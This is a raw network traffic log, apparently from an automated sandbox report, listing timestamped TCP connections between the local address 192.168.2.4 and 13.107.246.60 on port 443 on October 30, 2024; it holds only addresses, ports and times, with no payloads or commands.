                                                Oct 30, 2024 00:23:14.161899090 CET4435820613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.164236069 CET58211443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.164252996 CET4435821113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.164345026 CET58211443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.164524078 CET58211443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.164535046 CET4435821113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.334073067 CET4435820713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.334723949 CET58207443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.334755898 CET4435820713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.335231066 CET58207443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.335242987 CET4435820713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.467506886 CET4435820713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.467706919 CET4435820713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.467895031 CET58207443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.467998981 CET58207443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.468024969 CET4435820713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.468050003 CET58207443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.468063116 CET4435820713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.471625090 CET58212443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.471654892 CET4435821213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.471745014 CET58212443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.471985102 CET58212443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.471997976 CET4435821213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.793730974 CET4435820813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.794315100 CET58208443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.794332027 CET4435820813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.794894934 CET58208443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.794902086 CET4435820813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.828358889 CET4435820913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.828774929 CET58209443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.828794003 CET4435820913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.829200983 CET58209443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.829206944 CET4435820913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.835961103 CET4435821013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.836450100 CET58210443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.836460114 CET4435821013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.837025881 CET58210443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.837029934 CET4435821013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.898233891 CET4435821113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.898957014 CET58211443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.898973942 CET4435821113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.899585009 CET58211443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.899590015 CET4435821113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.928471088 CET4435820813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.928985119 CET4435820813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.929052114 CET58208443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.929161072 CET58208443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.929174900 CET4435820813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.929192066 CET58208443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.929197073 CET4435820813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.933151007 CET58213443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.933226109 CET4435821313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.933377028 CET58213443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.933552980 CET58213443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.933587074 CET4435821313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.961241007 CET4435820913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.961286068 CET4435820913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.961329937 CET4435820913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.961361885 CET58209443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.961420059 CET58209443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.961666107 CET58209443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.961678028 CET4435820913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.961709023 CET58209443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.961715937 CET4435820913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.964596033 CET58214443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.964617014 CET4435821413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.964705944 CET58214443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.964874983 CET58214443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.964888096 CET4435821413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.969858885 CET4435821013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.969938040 CET4435821013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.969993114 CET58210443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.970122099 CET58210443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.970129013 CET4435821013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.970143080 CET58210443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.970145941 CET4435821013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.972750902 CET58215443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.972796917 CET4435821513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:14.972887039 CET58215443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.973062038 CET58215443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:14.973086119 CET4435821513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.032783985 CET4435821113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.032836914 CET4435821113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.032908916 CET58211443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.033108950 CET58211443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.033117056 CET4435821113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.033130884 CET58211443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.033135891 CET4435821113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.035726070 CET58216443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.035821915 CET4435821613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.036037922 CET58216443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.036236048 CET58216443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.036266088 CET4435821613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.205420017 CET4435821213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.206089973 CET58212443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.206105947 CET4435821213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.206618071 CET58212443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.206623077 CET4435821213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.339687109 CET4435821213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.339726925 CET4435821213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.339899063 CET58212443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.340091944 CET58212443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.340107918 CET4435821213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.340122938 CET58212443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.340130091 CET4435821213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.344101906 CET58217443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.344181061 CET4435821713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.344285965 CET58217443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.344558954 CET58217443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.344590902 CET4435821713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.661186934 CET4435821313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.662045956 CET58213443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.662096977 CET4435821313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.662758112 CET58213443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.662771940 CET4435821313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.691787958 CET4435821413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.692419052 CET58214443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.692440033 CET4435821413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.693049908 CET58214443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.693057060 CET4435821413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.718828917 CET4435821513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.719235897 CET58215443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.719283104 CET4435821513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.719768047 CET58215443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.719783068 CET4435821513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.771984100 CET4435821613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.772464037 CET58216443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.772520065 CET4435821613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.772918940 CET58216443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.772933006 CET4435821613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.793790102 CET4435821313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.793807030 CET4435821313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.793864965 CET58213443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.793888092 CET4435821313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.794007063 CET4435821313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.794058084 CET58213443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.794137001 CET58213443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.794174910 CET4435821313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.794199944 CET58213443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.794214010 CET4435821313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.797550917 CET58218443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.797601938 CET4435821813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.797686100 CET58218443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.797847033 CET58218443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.797877073 CET4435821813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.824193954 CET4435821413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.825104952 CET4435821413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.825133085 CET4435821413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.825267076 CET58214443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.825267076 CET58214443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.825267076 CET58214443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.825267076 CET58214443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.827811956 CET58219443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.827857018 CET4435821913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.827949047 CET58219443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.828078032 CET58219443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.828108072 CET4435821913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.864492893 CET4435821513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.864527941 CET4435821513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.864576101 CET4435821513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.864583969 CET58215443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.864747047 CET58215443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.864777088 CET58215443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.864777088 CET58215443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.864797115 CET4435821513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.864816904 CET4435821513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.867271900 CET58221443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.867352962 CET4435822113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.867440939 CET58221443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.867598057 CET58221443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.867631912 CET4435822113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.905594110 CET4435821613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.905703068 CET4435821613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.905889034 CET58216443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.907885075 CET58216443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.907885075 CET58216443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.907923937 CET4435821613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.907951117 CET4435821613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.911369085 CET58222443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.911448002 CET4435822213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:15.911556005 CET58222443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.911730051 CET58222443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:15.911767006 CET4435822213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.120906115 CET4435821713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.121591091 CET58217443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.121634007 CET4435821713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.122128963 CET58217443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.122142076 CET4435821713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.132908106 CET58214443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.132927895 CET4435821413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.260396957 CET4435821713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.260474920 CET4435821713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.260507107 CET4435821713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.260540009 CET58217443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.260584116 CET58217443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.260812998 CET58217443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.260840893 CET4435821713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.260869980 CET58217443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.260883093 CET4435821713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.263566971 CET58223443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.263648033 CET4435822313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.263731003 CET58223443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.263869047 CET58223443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.263900995 CET4435822313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.543842077 CET4435821813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.544540882 CET58218443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.544598103 CET4435821813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.545315027 CET58218443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.545329094 CET4435821813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.576957941 CET4435821913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.577500105 CET58219443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.577521086 CET4435821913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.578100920 CET58219443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.578111887 CET4435821913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.618243933 CET4435822113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.627163887 CET58221443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.627224922 CET4435822113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.627664089 CET58221443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.627677917 CET4435822113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.657040119 CET4435822213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.657536030 CET58222443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.657589912 CET4435822213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.658271074 CET58222443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.658283949 CET4435822213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.679923058 CET4435821813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.679991007 CET4435821813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.680042982 CET58218443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.680191994 CET58218443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.680224895 CET4435821813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.680250883 CET58218443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.680264950 CET4435821813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.683429956 CET58224443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.683466911 CET4435822413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.683558941 CET58224443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.683700085 CET58224443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.683726072 CET4435822413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.712501049 CET4435821913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.712517977 CET4435821913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.712552071 CET4435821913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.712688923 CET58219443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.712688923 CET58219443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.712826967 CET58219443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.712827921 CET58219443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.712846994 CET4435821913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.712867975 CET4435821913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.715859890 CET58225443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.715909958 CET4435822513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.716008902 CET58225443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.716171026 CET58225443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.716201067 CET4435822513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.759449959 CET4435822113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.759480000 CET4435822113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.759526014 CET4435822113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.759659052 CET58221443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.759659052 CET58221443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.759805918 CET58221443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.759805918 CET58221443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.759835958 CET4435822113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.759860039 CET4435822113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.762784958 CET58226443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.762818098 CET4435822613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.762923956 CET58226443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.763055086 CET58226443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.763081074 CET4435822613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.792876005 CET4435822213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.792898893 CET4435822213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.792933941 CET4435822213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.792960882 CET58222443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.793000937 CET58222443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.793318033 CET58222443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.793354988 CET4435822213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.793416023 CET58222443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.793430090 CET4435822213.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.796508074 CET58227443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.796571970 CET4435822713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:16.796638966 CET58227443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.796833038 CET58227443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:16.796859026 CET4435822713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.009689093 CET4435822313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.010410070 CET58223443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.010438919 CET4435822313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.010946989 CET58223443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.010961056 CET4435822313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.146797895 CET4435822313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.147340059 CET4435822313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.147530079 CET58223443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.147530079 CET58223443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.147530079 CET58223443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.150382996 CET58228443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.150434017 CET4435822813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.150532961 CET58228443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.150662899 CET58228443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.150691032 CET4435822813.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.420578003 CET4435822413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.421228886 CET58224443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.421322107 CET4435822413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.421717882 CET58224443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.421734095 CET4435822413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.445332050 CET58223443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.445384979 CET4435822313.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.464504004 CET4435822513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.464879990 CET58225443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.464936018 CET4435822513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.465250969 CET58225443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.465264082 CET4435822513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.511359930 CET4435822613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.511888027 CET58226443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.511912107 CET4435822613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.512351990 CET58226443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.512363911 CET4435822613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.554127932 CET4435822413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.554205894 CET4435822413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.554280996 CET58224443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.554599047 CET58224443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.554599047 CET58224443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.554634094 CET4435822413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.554656029 CET4435822413.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.558003902 CET58229443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.558096886 CET4435822913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.558203936 CET58229443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.558372974 CET58229443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.558408022 CET4435822913.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.560503960 CET4435822713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.560868025 CET58227443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.560897112 CET4435822713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.561304092 CET58227443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.561316013 CET4435822713.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.606760025 CET4435822513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.606837034 CET4435822513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.607114077 CET58225443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.607292891 CET58225443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.607322931 CET4435822513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.607369900 CET58225443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.607378006 CET4435822513.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.611332893 CET58230443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.611396074 CET4435823013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.611625910 CET58230443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.611763000 CET58230443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.611788034 CET4435823013.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.648037910 CET4435822613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.648243904 CET4435822613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.648293972 CET4435822613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.648308039 CET58226443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.648472071 CET58226443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.648808002 CET58226443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.648808002 CET58226443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.648849010 CET4435822613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.648875952 CET4435822613.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.651746035 CET58231443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.651839018 CET4435823113.107.246.60192.168.2.4
                                                Oct 30, 2024 00:23:17.652036905 CET58231443192.168.2.413.107.246.60
                                                Oct 30, 2024 00:23:17.652205944 CET58231443192.168.2.413.107.246.60
